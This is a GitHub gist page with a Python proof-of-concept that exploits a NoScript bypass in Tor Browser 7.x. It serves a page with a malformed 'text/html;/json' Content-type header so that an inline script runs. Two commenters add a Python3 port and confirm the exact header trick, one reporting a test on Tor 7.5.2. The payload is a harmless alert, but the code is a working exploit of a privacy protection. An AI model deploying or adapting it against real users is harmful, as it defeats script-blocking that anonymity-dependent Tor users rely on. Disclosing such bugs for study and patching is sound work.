Skip to content

Instantly share code, notes, and snippets.

@x0rz x0rz/TorBrowser_7.x_NoScript_bypass.py
Last active Sep 9, 2019

Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
Raw
TorBrowser_7.x_NoScript_bypass.py
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
@sparskakyl

This comment has been minimized.

Sign in to view
Copy link

sparskakyl commented Sep 10, 2018

2 hacky wacky 4 me
@brammittendorff

This comment has been minimized.

Sign in to view
Copy link

brammittendorff commented Sep 10, 2018
edited

Python3 version:

#!/usr/bin/python
from http.server import BaseHTTPRequestHandler, HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)
                self.send_header('Content-type','text/html;/json') # Here is where the magic happens
                self.end_headers()
                self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>".encode())
                return

try:
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port %s' % PORT_NUMBER)
        server.serve_forever()

except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
@jorgeluengar

This comment has been minimized.

Sign in to view
Copy link

jorgeluengar commented Jun 10, 2019

@brammittendorff many thanks in advance for the Python3 version, but there is a small mistake regarding the exploit:
It must use:
self.send_header('Content-type','text/html;/json')
instead of
self.send_header('Content-type','text/html')

Tested on Tor 7.5.2

Thanks!
@brammittendorff

This comment has been minimized.

Sign in to view
Copy link

brammittendorff commented Jun 11, 2019

@jorgeluengar you are right, fixed my comment thanks!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.